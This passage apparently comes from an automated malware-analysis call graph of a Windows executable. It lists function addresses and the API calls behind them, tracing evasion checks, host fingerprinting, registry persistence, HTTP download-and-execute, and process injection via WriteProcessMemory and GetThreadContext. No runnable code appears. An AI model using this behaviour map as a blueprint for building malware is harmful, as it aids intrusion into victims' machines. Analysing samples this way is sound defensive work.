4234->4235 4236 7c1994 2 API calls 4235->4236 4237 7c2fd0 LoadLibraryA 4236->4237 4238 7c1994 2 API calls 4237->4238 4239 7c2ff0 LoadLibraryA 4238->4239 4240 7c1994 2 API calls 4239->4240 4241 7c3011 LoadLibraryA 4240->4241 4242 7c1994 2 API calls 4241->4242 4243 7c3032 4242->4243 4244 7c1994 2 API calls 4243->4244 4245 7c3044 4244->4245 4246 7c1994 2 API calls 4245->4246 4247 7c3056 4246->4247 4248 7c1994 2 API calls 4247->4248 4249 7c3068 4248->4249 4250 7c1994 2 API calls 4249->4250 4251 7c307a 4250->4251 4252 7c1994 2 API calls 4251->4252 4253 7c308c 4252->4253 4254 7c1994 2 API calls 4253->4254 4255 7c309e LoadLibraryA 4254->4255 4256 7c1994 2 API calls 4255->4256 4257 7c30bf 4256->4257 4258 7c1994 2 API calls 4257->4258 4259 7c30d1 4258->4259 4260 7c1994 2 API calls 4259->4260 4261 7c30e3 4260->4261 4262 7c1994 2 API calls 4261->4262 4263 7c30f5 4262->4263 4264 7c1994 2 API calls 4263->4264 4265 7c3107 4264->4265 4266 7c1994 2 API calls 4265->4266 4267 7c3119 4266->4267 4268 7c1994 2 API calls 4267->4268 4269 7c312b 4268->4269 4270 7c1994 2 API calls 4269->4270 4271 7c313d 4270->4271 4272 7c1994 2 API calls 4271->4272 4273 7c314f 4272->4273 4274 7c1994 2 API calls 4273->4274 4275 7c3161 4274->4275 4276 7c1994 2 API calls 4275->4276 4277 7c3173 4276->4277 4278 7c1994 2 API calls 4277->4278 4279 7c3185 4278->4279 4280 7c1994 2 API calls 4279->4280 4281 7c3197 4280->4281 4282 7c1994 2 API calls 4281->4282 4283 7c31a9 4282->4283 4284 7c1994 2 API calls 4283->4284 4285 7c31bb 4284->4285 4286 7c1994 2 API calls 4285->4286 4287 7c31cd 4286->4287 4288 7c1994 2 API calls 4287->4288 4289 7c31df 4288->4289 4290 7c1994 2 API calls 4289->4290 4291 7c31f1 4290->4291 4292 7c1994 2 API calls 4291->4292 4293 7c3203 4292->4293 4294 7c1994 2 API calls 4293->4294 4295 7c3215 4294->4295 4296 7c1994 2 API calls 4295->4296 4297 7c3227 4296->4297 4298 7c1994 2 API calls 4297->4298 4299 7c3239 4298->4299 4300 7c1994 2 API calls 4299->4300 4301 7c324b 4300->4301 4302 7c1994 2 API calls 4301->4302 4303 7c325d 4302->4303 4304 7c1994 2 API calls 4303->4304 4305 7c326f 4304->4305 4306 7c1994 2 API calls 4305->4306 4307 7c3281 4306->4307 4308 7c1994 2 API calls 4307->4308 4309 7c3293 4308->4309 4310 7c1994 2 API calls 4309->4310 4311 7c32a5 4310->4311 4312 7c1994 2 API calls 4311->4312 4313 7c32b7 4312->4313 4314 7c1994 2 API calls 4313->4314 4315 7c32c9 4314->4315 4316 7c1994 2 API calls 4315->4316 4317 7c32db 4316->4317 4318 7c1994 2 API calls 4317->4318 4319 7c32ed 4318->4319 4320 7c1994 2 API calls 4319->4320 4321 7c32ff 4320->4321 4322 7c1994 2 API calls 4321->4322 4323 7c3311 4322->4323 4324 7c1994 2 API calls 4323->4324 4325 7c3323 4324->4325 4326 7c1994 2 API calls 4325->4326 4327 7c3335 4326->4327 4328 7c1994 2 API calls 4327->4328 4329 7c3347 4328->4329 4330 7c1994 2 API calls 4329->4330 4331 7c3359 4330->4331 4332 7c1994 2 API calls 4331->4332 4333 7c336b 4332->4333 4334 7c1994 2 API calls 4333->4334 4335 7c337d LoadLibraryA 4334->4335 4336 7c1994 2 API calls 4335->4336 4337 7c339e 4336->4337 4338 7c1994 2 API calls 4337->4338 4339 7c33b0 4338->4339 4340 7c1994 2 API calls 4339->4340 4341 7c33c2 LoadLibraryA 4340->4341 4342 7c1994 2 API calls 4341->4342 4343 7c33e3 4342->4343 4344 7c1994 2 API calls 4343->4344 4345 7c33f5 4344->4345 4346 7c1994 2 API calls 4345->4346 4347 7c3407 LoadLibraryA 4346->4347 4348 7c1994 2 API calls 4347->4348 4349 7c3428 4348->4349 4350 7c1994 2 API calls 4349->4350 4351 7c343a 4350->4351 4352 7c1994 2 API calls 4351->4352 4353 7c344c LoadLibraryA 4352->4353 4354 7c1994 2 API calls 4353->4354 4355 7c346d 4354->4355 4356 7c1994 2 API calls 4355->4356 4357 7c347f LoadLibraryA 4356->4357 4358 7c1994 2 API calls 4357->4358 4359 7c34a0 4358->4359 4360 7c1994 2 API calls 4359->4360 4361 7c34b2 4360->4361 4362 7c1994 2 API calls 4361->4362 4363 7c34c4 LoadLibraryA 4362->4363 4364 7c1994 2 API calls 4363->4364 4365 7c34e5 4364->4365 4366 7c1994 2 API calls 4365->4366 4367 7c34f7 4366->4367 4368 7c37ef 4367->4368 4369 7c3506 LoadLibraryA 4367->4369 4449 7c8d0c 4368->4449 4370 7c1994 2 API calls 4369->4370 4371 7c3522 4370->4371 4372 7c1994 2 API calls 4371->4372 4373 7c3534 4372->4373 4374 7c1994 2 API calls 4373->4374 4375 7c3546 4374->4375 4376 7c1994 2 API calls 4375->4376 4377 7c3558 4376->4377 4378 7c1994 2 API calls 4377->4378 4379 7c356a 4378->4379 4380 7c1994 2 API calls 4379->4380 4381 7c357c 4380->4381 4382 7c1994 2 API calls 4381->4382 4383 7c358e 4382->4383 4384 7c1994 2 API calls 4383->4384 4385 7c35a0 4384->4385 4386 7c1994 2 API calls 4385->4386 4387 7c35b2 4386->4387 4388 7c1994 2 API calls 4387->4388 4389 7c35c4 4388->4389 4390 7c1994 2 API calls 4389->4390 4391 7c35d6 4390->4391 4392 7c1994 2 API calls 4391->4392 4393 7c35e8 4392->4393 4394 7c1994 2 API calls 4393->4394 4395 7c35fa 4394->4395 4396 7c1994 2 API calls 4395->4396 4397 7c360c 4396->4397 4398 7c1994 2 API calls 4397->4398 4399 7c361e 4398->4399 4400 7c1994 2 API calls 4399->4400 4401 7c3630 4400->4401 4402 7c1994 2 API calls 4401->4402 4403 7c3642 4402->4403 4404 7c1994 2 API calls 4403->4404 4405 7c3654 4404->4405 4406 7c1994 2 API calls 4405->4406 4407 7c3666 4406->4407 4408 7c1994 2 API calls 4407->4408 4409 7c3678 LoadLibraryA 4408->4409 4410 7c1994 2 API calls 4409->4410 4411 7c3699 4410->4411 4412 7c1994 2 API calls 4411->4412 4413 7c36ab 4412->4413 4414 7c1994 2 API calls 4413->4414 4415 7c36bd 4414->4415 4416 7c1994 2 API calls 4415->4416 4417 7c36cf 4416->4417 4418 7c1994 2 API calls 4417->4418 4419 7c36e1 4418->4419 4420 7c1994 2 API calls 4419->4420 4421 7c36f3 4420->4421 4422 7c1994 2 API calls 4421->4422 4423 7c3705 4422->4423 4424 7c1994 2 API calls 4423->4424 4425 7c3717 4424->4425 4426 7c1994 2 API calls 4425->4426 4427 7c3729 4426->4427 4428 7c1994 2 API calls 4427->4428 4429 7c373b 4428->4429 4430 7c1994 2 API calls 4429->4430 4431 7c374d 4430->4431 4432 7c1994 2 API calls 4431->4432 4433 7c375f 4432->4433 4434 7c1994 2 API calls 4433->4434 4435 7c3771 4434->4435 4436 7c1994 2 API calls 4435->4436 4437 7c3783 4436->4437 4438 7c1994 2 API calls 4437->4438 4439 7c3795 4438->4439 4440 7c1994 2 API calls 4439->4440 4441 7c37a7 4440->4441 4442 7c1994 2 API calls 4441->4442 4443 7c37b9 4442->4443 4444 7c1994 2 API calls 4443->4444 4445 7c37cb 4444->4445 4446 7c1994 2 API calls 4445->4446 4447 7c37dd 4446->4447 4448 7c1994 2 API calls 4447->4448 4448->4368 4450 7c8d1c 4449->4450 4451 7c2574 17 API calls 4450->4451 4452 7c8d29 4451->4452 4548 7c44f0 4452->4548 4454 7c8d2e GetCurrentProcess 4551 7c42d4 OpenProcessToken 4454->4551 4457 7c44f0 GetVersionExA 4458 7c8d48 4457->4458 4459 7c8d5d GetCurrentProcess 4458->4459 4460 7c8d4d 4458->4460 4461 7c42d4 11 API calls 4459->4461 4735 7c41cc GetCurrentThread OpenThreadToken 4460->4735 4463 7c8d52 GetCurrentProcess 4461->4463 4565 7c453c 4463->4565 4468 7c8d90 LocalAlloc 4576 7c4408 InitializeSecurityDescriptor 4468->4576 4471 7c8df3 4583 7c8bfc RegOpenKeyExA 4471->4583 4473 7c8df8 4590 7c7984 GetVolumeInformationA 4473->4590 4475 7c8dfd 4591 7c89d4 GetVolumeInformationA 4475->4591 4477 7c8e02 4593 7c7a44 GetModuleFileNameA 4477->4593 4483 7c8e48 4486 7c8e63 4483->4486 4487 7c471c 17 API calls 4483->4487 4488 7c8e69 4486->4488 4491 7c8ed8 4486->4491 4487->4486 4498 7c471c 17 API calls 4488->4498 4489 7c8f23 4490 7c744c 17 API calls 4489->4490 4492 7c8f2d 4490->4492 4491->4489 4494 7c8f0c 4491->4494 4644 7c8b98 4492->4644 4755 7c8b6c CreateThread CloseHandle 4494->4755 4500 7c8ead 4498->4500 4499 7c8f3c 4651 7c4ba0 GetComputerNameA 4499->4651 4504 7c8ec8 4500->4504 4505 7c8eb6 4500->4505 4501 7c8f1e 4695 7c38dc RtlEnterCriticalSection 4501->4695 4509 7c4a1c 3 API calls 4504->4509 4749 7c4a1c 4505->4749 4506 7c9029 4696 7c38ec RtlLeaveCriticalSection 4506->4696 4508 7c8f46 4512 7c5468 GetSystemTime 4508->4512 4509->4491 4514 7c8f4b 4512->4514 4513 7c903b 4697 7c5640 SHGetSpecialFolderPathA 4513->4697 4516 7c5468 GetSystemTime 4514->4516 4517 7c8f55 4516->4517 4519 7c3b80 2 API calls 4517->4519 4518 7c9046 4709 7c84a4 4518->4709 4521 7c8f65 4519->4521 4665 7c1440 GetProcessHeap HeapFree 4521->4665 4524 7c8f7d 4525 7c8f9a 4524->4525 4526 7c8f86 4524->4526 4528 7c8064 3 API calls 4525->4528 4666 7c8064 RegOpenKeyExA 4526->4666 4529 7c8f98 4528->4529 4531 7c8fc3 Sleep 4529->4531 4534 7c8fd7 4529->4534 4530 7c9015 4678 7c7474 4530->4678 4531->4531 4531->4534 4533 7c9006 4670 7c471c 4533->4670 4534->4530 4534->4533 4536 7c8ffc GetCursorPos 4534->4536 4536->4533 4538 7c250c 4537->4538 4539 7c1994 4538->4539 4540 7c19e8 4539->4540 4541 7c19b4 4539->4541 4540->3950 4541->4540 4542 7c1a62 4541->4542 4545 7c1928 4542->4545 4544 7c1a6b 4544->4540 4546 7c193c 4545->4546 4547 7c1961 LoadLibraryA GetProcAddress 4546->4547 4547->4544 4756 7c1258 4548->4756 4550 7c4509 GetVersionExA 4550->4454 4552 7c43f9 4551->4552 4553 7c4300 GetTokenInformation 4551->4553 4552->4457 4554 7c4322 GetLastError 4553->4554 4555 7c43ef CloseHandle 4553->4555 4554->4555 4556 7c4331 4554->4556 4555->4552 4757 7c13dc GetProcessHeap RtlAllocateHeap 4556->4757 4558 7c4339 4558->4555 4559 7c4346 GetTokenInformation 4558->4559 4560 7c4368 GetSidSubAuthorityCount 4559->4560 4564 7c43a2 4559->4564 4561 7c437d 4560->4561 4560->4564 4563 7c4385 GetSidSubAuthority 4561->4563 4561->4564 4563->4564 4758 7c1440 GetProcessHeap HeapFree 4564->4758 4566 7c454f 4565->4566 4567 7c4555 GetCurrentProcess 4565->4567 4566->4567 4568 7c455e 4566->4568 4567->4568 4569 7c4567 IsWow64Process 4568->4569 4570 7c4579 4568->4570 4569->4570 4571 7c79bc 4570->4571 4572 7c79f1 4571->4572 4573 7c7a0f RtlInitializeCriticalSection 4572->4573 4759 7c1258 4573->4759 4575 7c7a29 RtlInitializeCriticalSection 4575->4468 4577 7c442d SetSecurityDescriptorDacl 4576->4577 4582 7c44bb CreateMutexA LocalFree 4576->4582 4578 7c4445 ConvertStringSecurityDescriptorToSecurityDescriptorA 4577->4578 4577->4582 4579 7c4463 GetSecurityDescriptorSacl 4578->4579 4578->4582 4580 7c4488 SetSecurityDescriptorSacl 4579->4580 4581 7c44a8 LocalFree 4579->4581 4580->4581 4580->4582 4581->4582 4582->4471 4760 7c38b0 RegQueryValueExA 4583->4760 4585 7c8c4b 4761 7c38b0 RegQueryValueExA 4585->4761 4587 7c8c97 4762 7c3890 RegCloseKey 4587->4762 4589 7c8ca2 4589->4473 4590->4475 4592 7c8a0c 4591->4592 4592->4477 4594 7c48dc 4593->4594 4595 7c7a7d GetFileVersionInfoSizeA 4594->4595 4596 7c7a9b 4595->4596 4597 7c7bf5 RtlInitializeCriticalSection 4595->4597 4763 7c13dc GetProcessHeap RtlAllocateHeap 4596->4763 4610 7c47ac CreateFileA 4597->4610 4599 7c7aa3 GetFileVersionInfoA 4601 7c7ac7 4599->4601 4609 7c7bd6 4599->4609 4764 7c1864 wsprintfA 4601->4764 4603 7c7b18 4765 7c1864 wsprintfA 4603->4765 4605 7c7b55 4766 7c1864 wsprintfA 4605->4766 4607 7c7b99 4767 7c1864 wsprintfA 4607->4767 4768 7c1440 GetProcessHeap HeapFree 4609->4768 4611 7c4804 4610->4611 4612 7c47e8 CreateFileA 4610->4612 4613 7c4855 4611->4613 4614 7c480a GetFileSize 4611->4614 4612->4611 4618 7c7304 4613->4618 4614->4613 4615 7c481f 4614->4615 4769 7c13b4 VirtualAlloc 4615->4769 4617 7c482b ReadFile CloseHandle 4617->4613 4619 7c733c RegOpenKeyExA 4618->4619 4620 7c731b RegOpenKeyExA 4618->4620 4621 7c735b 4619->4621 4620->4621 4622 7c7445 4621->4622 4770 7c38b0 RegQueryValueExA 4621->4770 4622->4483 4640 7c744c 4622->4640 4624 7c743d 4780 7c3890 RegCloseKey 4624->4780 4625 7c737f 4625->4624 4771 7c13dc GetProcessHeap RtlAllocateHeap 4625->4771 4628 7c739c 4772 7c13dc GetProcessHeap RtlAllocateHeap 4628->4772 4630 7c73ad 4773 7c38b0 RegQueryValueExA 4630->4773 4632 7c73c7 4633 7c59bc 6 API calls 4632->4633 4634 7c73e2 4633->4634 4639 7c73f3 4634->4639 4774 7c72c4 4634->4774 4637 7c7435 4779 7c1440 GetProcessHeap HeapFree 4637->4779 4778 7c1440 GetProcessHeap HeapFree 4639->4778 4641 7c7469 4640->4641 4642 7c72c4 17 API calls 4641->4642 4643 7c7471 4642->4643 4643->4483 4645 7c8ba8 SHGetSpecialFolderPathA 4644->4645 4646 7c8bcc SHGetSpecialFolderPathA 4644->4646 4647 7c8bc7 4645->4647 4646->4647 4812 7c7560 4647->4812 4649 7c8bf5 4650 7c8b6c CreateThread CloseHandle 4649->4650 4650->4499 4819 7c8aa4 4650->4819 4652 7c4beb RegOpenKeyExA 4651->4652 4656 7c4bcd 4651->4656 4826 7c38b0 RegQueryValueExA 4652->4826 4655 7c4c2c 4827 7c38b0 RegQueryValueExA 4655->4827 4656->4652 4657 7c4c76 4828 7c38b0 RegQueryValueExA 4657->4828 4660 7c4cc0 4829 7c38b0 RegQueryValueExA 4660->4829 4661 7c4d0c 4830 7c3890 RegCloseKey 4661->4830 4663 7c4d17 GetVolumeInformationA 4664 7c4d60 4663->4664 4664->4508 4665->4524 4667 7c8095 RegDeleteValueA 4666->4667 4668 7c80b7 4666->4668 4831 7c3890 RegCloseKey 4667->4831 4668->4529 4671 7c4733 4670->4671 4832 7c13dc GetProcessHeap RtlAllocateHeap 4671->4832 4673 7c4742 4674 7c4764 CreateThread SetThreadPriority CloseHandle 4673->4674 4675 7c4798 4673->4675 4677 7c47a1 4674->4677 4833 7c4608 4675->4833 4677->4530 4679 7c7493 4678->4679 4680 7c72c4 17 API calls 4679->4680 4681 7c749e 4680->4681 4682 7c5894 6 API calls 4681->4682 4683 7c74be 4682->4683 4850 7c13dc GetProcessHeap RtlAllocateHeap 4683->4850 4685 7c74c6 4686 7c5894 6 API calls 4685->4686 4687 7c74e6 4686->4687 4688 7c74ef RegCreateKeyExA 4687->4688 4689 7c7515 RegCreateKeyExA 4687->4689 4690 7c7539 4688->4690 4689->4690 4851 7c3930 RegSetValueExA 4690->4851 4692 7c7550 4852 7c3890 RegCloseKey 4692->4852 4694 7c755b 4694->4501 4695->4506 4696->4513 4853 7c133c 4697->4853 4699 7c567c FindFirstFileA 4700 7c56ab 4699->4700 4701 7c5839 FindClose 4700->4701 4702 7c581a FindNextFileA 4700->4702 4704 7c47ac 6 API calls 4700->4704 4708 7c5759 4700->4708 4855 7c3988 FindFirstFileA FindClose 4700->4855 4856 7c1828 VirtualFree 4700->4856 4701->4518 4702->4700 4702->4701 4704->4700 4707 7c5810 4707->4701 4857 7c1828 VirtualFree 4708->4857 4858 7c13dc GetProcessHeap RtlAllocateHeap 4709->4858 4711 7c84c1 4714 7c8514 Sleep 4711->4714 4717 7c8521 4711->4717 4859 7c5ae8 4711->4859 4712 7c64bc 7 API calls 4712->4717 4714->4711 4715 7c1864 wsprintfA 4715->4717 4717->4712 4717->4715 4719 7c86e3 GetTickCount 4717->4719 4721 7c5d20 29 API calls 4717->4721 4722 7c5468 GetSystemTime 4717->4722 4724 7c7474 27 API calls 4717->4724 4728 7c87d6 4717->4728 4869 7c8258 WSAStartup gethostname gethostbyname 4717->4869 4874 7c4154 GetKeyboardLayoutList 4717->4874 4876 7c660c 4717->4876 4719->4717 4720 7c86fd Sleep 4719->4720 4720->4717 4721->4717 4722->4717 4724->4717 4725 7c8957 Sleep 4725->4725 4725->4728 4728->4717 4728->4725 4729 7c80c0 33 API calls 4728->4729 4730 7c1440 GetProcessHeap HeapFree 4728->4730 4894 7c82f8 4728->4894 4914 7c1440 GetProcessHeap HeapFree 4728->4914 4915 7c7f20 4728->4915 4919 7c1440 GetProcessHeap HeapFree 4728->4919 4729->4728 4730->4728 4733 7c8877 RtlExitUserThread 4733->4728 4734 7c88b4 RtlExitUserThread 4734->4728 4736 7c4217 4735->4736 4737 7c41f4 GetLastError 4735->4737 4738 7c42cc 4736->4738 5035 7c13dc GetProcessHeap RtlAllocateHeap 4736->5035 4737->4736 4739 7c4201 GetCurrentProcess OpenProcessToken 4737->4739 4738->4463 4739->4736 4741 7c422b GetTokenInformation CloseHandle 4742 7c425a AllocateAndInitializeSid 4741->4742 4743 7c42c4 4741->4743 4744 7c42ba FreeSid 4742->4744 4745 7c4288 4742->4745 5036 7c1440 GetProcessHeap HeapFree 4743->5036 4744->4743 4745->4744 4747 7c4293 EqualSid 4745->4747 4747->4745 4748 7c42ac 4747->4748 4748->4744 5037 7c395c RegOpenKeyA 4749->5037 4751 7c4a3c 4752 7c4a4a RegDeleteValueA 4751->4752 5038 7c3890 RegCloseKey 4752->5038 4754 7c4a63 4754->4491 4755->4501 5039 7c8aa4 6 API calls 4755->5039 4756->4550 4757->4558 4758->4555 4759->4575 4760->4585 4761->4587 4762->4589 4763->4599 4764->4603 4765->4605 4766->4607 4767->4609 4768->4597 4769->4617 4770->4625 4771->4628 4772->4630 4773->4632 4775 7c72dc 4774->4775 4781 7c6eec 4775->4781 4778->4637 4779->4624 4780->4622 4804 7c3f38 4781->4804 4785 7c6f1c 4786 7c70c7 4785->4786 4787 7c1994 2 API calls 4785->4787 4786->4639 4788 7c6f33 4787->4788 4789 7c1994 2 API calls 4788->4789 4790 7c6f45 4789->4790 4791 7c1994 2 API calls 4790->4791 4792 7c6f57 4791->4792 4793 7c1994 2 API calls 4792->4793 4794 7c6f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 4793->4794 4808 7c12dc 4794->4808 4797 7c3f38 2 API calls 4798 7c7001 4797->4798 4799 7c701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 4798->4799 4800 7c12dc 4799->4800 4801 7c708e CharLowerBuffA SetupDiDestroyDeviceInfoList 4800->4801 4802 7c70b4 4801->4802 4810 7c1440 GetProcessHeap HeapFree 4802->4810 4811 7c13dc GetProcessHeap RtlAllocateHeap 4804->4811 4806 7c3f6c LoadLibraryA 4807 7c1440 GetProcessHeap HeapFree 4806->4807 4807->4785 4809 7c12f0 CharLowerBuffA SetupDiDestroyDeviceInfoList 4808->4809 4809->4797 4810->4786 4811->4806 4813 7c756c 4812->4813 4814 7c3b80 2 API calls 4813->4814 4815 7c75a5 4814->4815 4818 7c1440 GetProcessHeap HeapFree 4815->4818 4817 7c75c3 4817->4649 4818->4817 4820 7c8aaf 4819->4820 4821 7c8ad4 RegisterClassExA CreateWindowExA 4820->4821 4822 7c8b5b RtlExitUserThread 4821->4822 4823 7c8b31 4821->4823 4824 7c8b47 GetMessageA 4823->4824 4824->4822 4825 7c8b33 TranslateMessage DispatchMessageA 4824->4825 4825->4824 4826->4655 4827->4657 4828->4660 4829->4661 4830->4663 4831->4668 4832->4673 4834 7c4627 4833->4834 4836 7c4639 4834->4836 4837 7c4645 CreateFileA 4834->4837 4844 7c46df 4834->4844 4848 7c3988 FindFirstFileA FindClose 4834->4848 4849 7c1440 GetProcessHeap HeapFree 4836->4849 4838 7c466a GetFileSize 4837->4838 4839 7c46c6 DeleteFileA 4837->4839 4841 7c4684 4838->4841 4842 7c46b2 FlushFileBuffers CloseHandle 4838->4842 4839->4834 4839->4836 4845 7c468e WriteFile 4841->4845 4842->4839 4843 7c4712 4843->4677 4846 7c46f6 Sleep 4844->4846 4847 7c46e5 Sleep 4844->4847 4845->4842 4845->4845 4846->4834 4847->4834 4848->4834 4849->4843 4850->4685 4851->4692 4852->4694 4854 7c1345 4853->4854 4854->4699 4855->4700 4856->4702 4857->4707 4858->4711 4862 7c5b06 4859->4862 4860 7c5d12 4860->4711 4862->4860 4863 7c170c InternetSetOptionA 4862->4863 4868 7c151c InternetCloseHandle 4862->4868 4920 7c3864 InternetOpenA 4862->4920 4921 7c161c InternetConnectA 4862->4921 4922 7c1660 HttpOpenRequestA 4862->4922 4923 7c15e4 HttpSendRequestA 4862->4923 4924 7c39cc HttpQueryInfoA 4862->4924 4863->4862 4868->4862 4870 7c82ef 4869->4870 4873 7c829b 4869->4873 4870->4717 4871 7c82ab inet_ntoa 4871->4873 4872 7c82e9 WSACleanup 4872->4870 4873->4871 4873->4872 4875 7c4178 4874->4875 4875->4717 4877 7c64bc 7 API calls 4876->4877 4891 7c6630 4877->4891 4878 7c66fd GetTickCount 4878->4891 4879 7c66f0 Sleep 4879->4891 4880 7c5d20 29 API calls 4880->4891 4881 7c66de 4928 7c1440 GetProcessHeap HeapFree 4881->4928 4882 7c67af GetTickCount 4884 7c67c4 Sleep 4882->4884 4882->4891 4884->4891 4885 7c66e6 4885->4717 4886 7c678d 4929 7c1440 GetProcessHeap HeapFree 4886->4929 4887 7c5468 GetSystemTime 4887->4891 4889 7c67ee Sleep 4925 7c5620 4889->4925 4891->4878 4891->4879 4891->4880 4891->4881 4891->4882 4891->4886 4891->4887 4891->4889 4892 7c5ae8 7 API calls 4891->4892 4893 7c680a Sleep 4891->4893 4892->4891 4893->4891 4895 7c8317 4894->4895 4896 7c8481 4895->4896 4898 7c833e 4895->4898 4912 7c8416 4896->4912 4934 7c7290 CreateThread CloseHandle 4896->4934 4899 7c8358 GetTempPathA 4898->4899 4898->4912 4900 7c7560 4 API calls 4899->4900 4901 7c8375 4900->4901 4902 7c83cd 4901->4902 4903 7c842b 4901->4903 4905 7c485c 4 API calls 4902->4905 4932 7c1828 VirtualFree 4903->4932 4906 7c83de Sleep CreateProcessA 4905->4906 4908 7c841f 4906->4908 4906->4912 4907 7c843c 4933 7c13b4 VirtualAlloc 4907->4933 4931 7c7290 CreateThread CloseHandle 4908->4931 4911 7c8449 4913 7c8459 wsprintfA 4911->4913 4912->4728 4913->4912 4914->4733 4917 7c7f3a 4915->4917 4916 7c804e 4916->4728 4917->4916 4935 7c7e28 4917->4935 4919->4734 4920->4862 4921->4862 4922->4862 4923->4862 4924->4862 4930 7c14f8 InternetGetConnectedState 4925->4930 4927 7c5635 4927->4891 4928->4885 4929->4885 4930->4927 4931->4912 4932->4907 4933->4911 4934->4912 4936 7c7e49 4935->4936 4938 7c7e6d 4935->4938 4937 7c7e68 4936->4937 4939 7c7e5a 4936->4939 4948 7c7eed 4936->4948 4937->4917 4938->4937 4940 7c7e7f lstrcmpi 4938->4940 4941 7c7e61 4939->4941 4942 7c7eb8 4939->4942 4943 7c7eac 4940->4943 4946 7c7e93 4940->4946 4941->4937 4949 7c7474 27 API calls 4941->4949 4951 7c7d3c GetTempPathA 4942->4951 4945 7c7240 36 API calls 4943->4945 4945->4937 4947 7c7474 27 API calls 4946->4947 4947->4937 4950 7c7474 27 API calls 4948->4950 4949->4937 4950->4937 4952 7c7d6e 4951->4952 4953 7c7e18 4952->4953 4963 7c3c28 4952->4963 4953->4937 4956 7c7e1a 4959 7c7240 36 API calls 4956->4959 4957 7c7db9 ShellExecuteA 4957->4953 4958 7c7dd9 4957->4958 4994 7c1864 wsprintfA 4958->4994 4959->4953 4961 7c7de6 4962 7c7240 36 API calls 4961->4962 4962->4953 4964 7c3c45 4963->4964 4966 7c3c4a 4963->4966 4995 7c3a04 4964->4995 5014 7c3864 InternetOpenA 4966->5014 4968 7c3d01 5015 7c161c InternetConnectA 4968->5015 4970 7c3d36 5016 7c1660 HttpOpenRequestA 4970->5016 4972 7c3d6f 4973 7c3dac 4972->4973 5017 7c16d8 InternetQueryOptionA 4972->5017 5019 7c15e4 HttpSendRequestA 4973->5019 4976 7c3d93 5018 7c170c InternetSetOptionA 4976->5018 4977 7c3dbc 5020 7c39cc HttpQueryInfoA 4977->5020 4980 7c3de5 4981 7c3df2 CreateFileA 4980->4981 4982 7c3e78 4980->4982 4981->4982 4987 7c3e17 4981->4987 5023 7c151c InternetCloseHandle 4982->5023 4984 7c3e80 5024 7c151c InternetCloseHandle 4984->5024 4993 7c3e67 CloseHandle 4987->4993 5021 7c16a4 InternetQueryDataAvailable 4987->5021 5022 7c15b0 InternetReadFile 4987->5022 4988 7c3e88 5025 7c151c InternetCloseHandle 4988->5025 4990 7c3e40 WriteFile 4990->4987 4992 7c3e90 4992->4956 4992->4957 4993->4982 4994->4961 5026 7c395c RegOpenKeyA 4995->5026 4997 7c3a27 5027 7c38b0 RegQueryValueExA 4997->5027 4999 7c3a43 5028 7c3890 RegCloseKey 4999->5028 5001 7c3a4e 5029 7c395c RegOpenKeyA 5001->5029 5003 7c3a8e 5030 7c38b0 RegQueryValueExA 5003->5030 5005 7c3aac 5031 7c3890 RegCloseKey 5005->5031 5007 7c3ab7 5032 7c395c RegOpenKeyA 5007->5032 5010 7c3ade 5011 7c3b49 5010->5011 5033 7c38fc RegEnumValueA 5010->5033 5034 7c3890 RegCloseKey 5011->5034 5013 7c3b63 5013->4966 5014->4968 5015->4970 5016->4972 5017->4976 5018->4973 5019->4977 5020->4980 5021->4987 5022->4990 5023->4984 5024->4988 5025->4992 5026->4997 5027->4999 5028->5001 5029->5003 5030->5005 5031->5007 5032->5010 5033->5010 5034->5013 5035->4741 5036->4738 5037->4751 5038->4754 5119 7c3b6b GetCommandLineA 5437 7c71d2 5439 7c71d4 5437->5439 5438 7c7231 5439->5438 5440 7c64bc 7 API calls 5439->5440 5441 7c71fc 5440->5441 5442 7c5d20 29 API calls 5441->5442 5442->5438 5443 7c7f1c 5445 7c7f20 5443->5445 5444 7c804e 5445->5444 5446 7c7e28 60 API calls 5445->5446 5446->5445 5120 7c91ac 5121 7c91ae 5120->5121 5124 7c69bc 5121->5124 5132 7c6904 GetComputerNameA 5124->5132 5126 7c69d5 GetTempPathA 5127 7c69fa 5126->5127 5128 7c47ac 6 API calls 5127->5128 5129 7c6a0b 5128->5129 5130 7c6a2f 5129->5130 5139 7c1828 VirtualFree 5129->5139 5133 7c694f RegOpenKeyExA 5132->5133 5137 7c6931 5132->5137 5140 7c38b0 RegQueryValueExA 5133->5140 5135 7c6992 5141 7c3890 RegCloseKey 5135->5141 5137->5133 5138 7c699d 5138->5126 5139->5130 5140->5135 5141->5138 5142 7c6bf0 5145 7c6b60 5142->5145 5144 7c6bfe 5146 7c6b78 5145->5146 5147 7c6b8b Sleep 5146->5147 5147->5146 5148 7c6b9f 5147->5148 5148->5144 5149 7c3c26 5150 7c3c28 5149->5150 5151 7c3a04 4 API calls 5150->5151 5152 7c3c4a 5150->5152 5151->5152 5180 7c3864 InternetOpenA 5152->5180 5154 7c3d01 5181 7c161c InternetConnectA 5154->5181 5156 7c3d36 5182 7c1660 HttpOpenRequestA 5156->5182 5158 7c3d6f 5159 7c3dac 5158->5159 5183 7c16d8 InternetQueryOptionA 5158->5183 5185 7c15e4 HttpSendRequestA 5159->5185 5162 7c3d93 5184 7c170c InternetSetOptionA 5162->5184 5163 7c3dbc 5186 7c39cc HttpQueryInfoA 5163->5186 5166 7c3de5 5167 7c3df2 CreateFileA 5166->5167 5168 7c3e78 5166->5168 5167->5168 5173 7c3e17 5167->5173 5189 7c151c InternetCloseHandle 5168->5189 5170 7c3e80 5190 7c151c InternetCloseHandle 5170->5190 5179 7c3e67 CloseHandle 5173->5179 5187 7c16a4 InternetQueryDataAvailable 5173->5187 5188 7c15b0 InternetReadFile 5173->5188 5174 7c3e88 5191 7c151c InternetCloseHandle 5174->5191 5176 7c3e40 WriteFile 5176->5173 5178 7c3e90 5179->5168 5180->5154 5181->5156 5182->5158 5183->5162 5184->5159 5185->5163 5186->5166 5187->5173 5188->5176 5189->5170 5190->5174 5191->5178 5192 7c5026 5193 7c5028 5192->5193 5194 7c503e GetModuleHandleA 5193->5194 5195 7c5049 5193->5195 5194->5195 5196 7c506e CreateProcessA 5195->5196 5197 7c52ce 5196->5197 5198 7c50a3 5196->5198 5199 7c50c4 CreateFileMappingA MapViewOfFile 5198->5199 5200 7c5124 5199->5200 5216 7c13b4 VirtualAlloc 5200->5216 5202 7c5169 5217 7c4ef0 5202->5217 5204 7c51db 5206 7c51f4 GetThreadContext 5204->5206 5209 7c5213 5204->5209 5205 7c5240 VirtualProtectEx WriteProcessMemory 5237 